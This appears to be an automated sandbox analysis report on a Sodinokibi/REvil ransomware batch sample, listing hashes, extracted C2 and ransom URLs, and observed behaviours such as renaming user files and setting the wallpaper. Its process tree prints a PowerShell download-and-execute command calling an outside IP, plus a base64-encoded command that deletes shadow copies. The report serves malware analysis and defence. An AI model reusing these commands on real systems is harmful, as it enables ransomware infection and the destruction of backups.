Analysis
-
max time kernel
85s -
max time network
99s -
platform
windows7_x64 -
resource
win7 -
submitted
15-08-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
671ad8514649a9e90db4be04050939fc.bat
Resource
win7
Behavioral task
behavioral2
Sample
671ad8514649a9e90db4be04050939fc.bat
Resource
win10
General
-
Target
671ad8514649a9e90db4be04050939fc.bat
-
Size
222B
-
MD5
ae3b86ee141489a333cd5b79879ce5fb
-
SHA1
59fcd2d5b1dc48ea3a135a908d2342f41801c748
-
SHA256
9f5a1dc3b6de60187465045347cd822a1442279e6d75aa5b8e08bfe8811619c4
-
SHA512
08e7101feb1b8fcc3e48a3b6586279038d039490a198bbfa3c71acfb6c020b917a5941517376d1f7518f8e28b810f871c0401ad2aa0dc5ff86c522a18973d6c7
Malware Config
Extracted
http://185.103.242.78/pastes/671ad8514649a9e90db4be04050939fc
Extracted
C:\t59qq1s-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FA804DD0DEFEFFDE
http://decryptor.cc/FA804DD0DEFEFFDE
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 4 932 powershell.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\UnprotectRedo.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ConnectCheckpoint.crw => \??\c:\users\admin\pictures\ConnectCheckpoint.crw.t59qq1s powershell.exe File renamed C:\Users\Admin\Pictures\LockRemove.raw => \??\c:\users\admin\pictures\LockRemove.raw.t59qq1s powershell.exe File renamed C:\Users\Admin\Pictures\SubmitCompare.crw => \??\c:\users\admin\pictures\SubmitCompare.crw.t59qq1s powershell.exe File renamed C:\Users\Admin\Pictures\UnprotectRedo.tiff => \??\c:\users\admin\pictures\UnprotectRedo.tiff.t59qq1s powershell.exe File renamed C:\Users\Admin\Pictures\WriteRegister.png => \??\c:\users\admin\pictures\WriteRegister.png.t59qq1s powershell.exe File renamed C:\Users\Admin\Pictures\DismountCheckpoint.crw => \??\c:\users\admin\pictures\DismountCheckpoint.crw.t59qq1s powershell.exe File renamed C:\Users\Admin\Pictures\LimitUnprotect.tif => \??\c:\users\admin\pictures\LimitUnprotect.tif.t59qq1s powershell.exe File renamed C:\Users\Admin\Pictures\ReceiveResize.crw => \??\c:\users\admin\pictures\ReceiveResize.crw.t59qq1s powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2l37v7e2.bmp" powershell.exe -
Drops file in Program Files directory 27 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\t59qq1s-readme.txt powershell.exe File opened for modification \??\c:\program files\RenameResolve.odt powershell.exe File created \??\c:\program files (x86)\t59qq1s-readme.txt powershell.exe File opened for modification \??\c:\program files\JoinSync.ex_ powershell.exe File opened for modification \??\c:\program files\ResetMount.tmp powershell.exe File opened for modification \??\c:\program files\TraceRestart.mpeg3 powershell.exe File opened for modification \??\c:\program files\StepMerge.xml powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\t59qq1s-readme.txt powershell.exe File opened for modification \??\c:\program files\CompareExpand.pdf powershell.exe File opened for modification \??\c:\program files\CompressCompare.odp powershell.exe File opened for modification \??\c:\program files\InstallFind.wvx powershell.exe File opened for modification \??\c:\program files\JoinSplit.vb powershell.exe File opened for modification \??\c:\program files\RenameWrite.rtf powershell.exe File opened for modification \??\c:\program files\AddConvertTo.cfg powershell.exe File opened for modification \??\c:\program files\SetInvoke.ini powershell.exe File opened for modification \??\c:\program files\UseOpen.jpeg powershell.exe File opened for modification \??\c:\program files\ExpandFormat.css powershell.exe File created \??\c:\program files\microsoft sql server compact edition\t59qq1s-readme.txt powershell.exe File opened for modification \??\c:\program files\PublishPop.mp4 powershell.exe File opened for modification \??\c:\program files\UnregisterSync.easmx powershell.exe File opened for modification \??\c:\program files\CompleteRedo.snd powershell.exe File opened for modification \??\c:\program files\ImportRename.midi powershell.exe File opened for modification \??\c:\program files\UnregisterPush.pps powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\t59qq1s-readme.txt powershell.exe File opened for modification \??\c:\program files\EnterPush.png powershell.exe File opened for modification \??\c:\program files\LimitSync.xhtml powershell.exe File opened for modification \??\c:\program files\OpenOut.htm powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 932 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 932 powershell.exe 932 powershell.exe 932 powershell.exe 1848 powershell.exe 1848 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 932 powershell.exe Token: SeDebugPrivilege 932 powershell.exe Token: SeDebugPrivilege 1848 powershell.exe Token: SeBackupPrivilege 1640 vssvc.exe Token: SeRestorePrivilege 1640 vssvc.exe Token: SeAuditPrivilege 1640 vssvc.exe Token: SeTakeOwnershipPrivilege 932 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1448 wrote to memory of 932 1448 cmd.exe powershell.exe PID 1448 wrote to memory of 932 1448 cmd.exe powershell.exe PID 1448 wrote to memory of 932 1448 cmd.exe powershell.exe PID 1448 wrote to memory of 932 1448 cmd.exe powershell.exe PID 932 wrote to memory of 1848 932 powershell.exe powershell.exe PID 932 wrote to memory of 1848 932 powershell.exe powershell.exe PID 932 wrote to memory of 1848 932 powershell.exe powershell.exe PID 932 wrote to memory of 1848 932 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\671ad8514649a9e90db4be04050939fc.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/671ad8514649a9e90db4be04050939fc');Invoke-BLPXTQOPGQRVCUQ;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1640